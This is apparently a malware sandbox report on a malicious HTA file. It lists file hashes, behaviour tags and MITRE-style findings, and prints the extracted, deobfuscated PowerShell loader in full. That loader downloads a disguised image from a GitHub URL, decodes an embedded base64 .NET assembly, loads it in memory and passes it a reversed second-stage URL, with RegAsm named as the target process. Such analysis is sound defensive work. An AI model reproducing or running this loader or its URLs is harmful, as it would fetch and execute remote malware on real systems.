Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    nicetokissthebestthingsiwantotgetmebackwith.hta

  • Size

    130KB

  • Sample

    241017-rcnzwszgkc

  • MD5

    b581033fd1ba02c7724802d3ccda9b5b

  • SHA1

    ad4484b11cfd436200542cc8e4fbaebcb7491bf8

  • SHA256

    008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4

  • SHA512

    12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47

  • SSDEEP

    192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
invoke-expression "$imageUrl = 'https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RDCCNM/055/831.922.571.701//:ptth', 'desativado', 'desativado', 'desativado', 'RegAsm', 'desativado', 'desativado'));"
3
4
# powershell snippet 1
5
$imageurl = "https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg "
6
$webclient = new-object system.net.webclient
7
$imagebytes = $webclient.downloaddata("https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg ")
8
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
9
$startflag = "<<BASE64_START>>"
10
$endflag = "<<BASE64_END>>"
11
$startindex = $imagetext.indexof("<<BASE64_START>>")
12
$endindex = $imagetext.indexof("<<BASE64_END>>")
13
$startindex -ge 0 -and $endindex -gt $startindex
14
$startindex = $startflag.length
15
$base64length = $endindex - $startindex
16
$base64command = $imagetext.substring($startindex, $base64length)
17
$commandbytes = [system.convert]::frombase64string($base64command)
18
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
19
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
20
$vaimethod.invoke($null, "txt.RDCCNM/055/831.922.571.701//:ptth", "desativado", "desativado", "desativado", "RegAsm", "desativado", "desativado")
URLs
ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Targets

    • Target

      nicetokissthebestthingsiwantotgetmebackwith.hta

    • Size

      130KB

    • MD5

      b581033fd1ba02c7724802d3ccda9b5b

    • SHA1

      ad4484b11cfd436200542cc8e4fbaebcb7491bf8

    • SHA256

      008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4

    • SHA512

      12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47

    • SSDEEP

      192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Evasion via Device Credential Deployment

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.